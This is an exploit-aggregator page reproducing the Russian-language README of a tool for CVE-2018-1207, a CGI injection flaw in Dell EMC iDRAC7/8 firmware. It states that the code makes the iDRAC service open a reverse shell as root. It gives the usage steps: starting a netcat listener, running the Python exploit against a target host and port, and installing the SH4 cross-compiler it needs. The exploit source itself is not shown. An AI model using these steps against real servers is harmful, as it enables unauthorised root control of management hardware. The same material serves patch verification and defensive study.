Sploitus

Exploit for cve-2018-1207 CVE-2018-1207

kitploit · 2026-09-01

Exploit Code

MARKDOWN26 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MGARGIULLO-CVE-2018-1207
# cve-2018-1207

Эксплойт iDRAC 7 & 8 прошивка < 2.52.52.52

## Описание

Dell EMC iDRAC7/iDRAC8, версии до 2.52.52.52, содержат уязвимость внедрения CGI, которая может быть использована для удаленного выполнения кода. Удаленный неавторизованный злоумышленник потенциально может использовать переменные CGI для выполнения удаленного кода.

Этот код должен заставить службу iDRAC открыть обратную оболочку от имени пользователя root.

## Использование

Запустите локальный слушатель: nc -v -l -p local_port

`nc -v -l -p 5500`

Запустите эксплойт: python ./cve-2018-1207.py remote_host remote_port local_host local_port

`python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500`

## Требования

Вам необходимо установить версию `sh4-linux-gnu-gcc`, в настоящее время это `sh4-linux-gnu-gcc-11`

Вы можете установить её с помощью `apt install gcc-11-sh4-linux-gnu`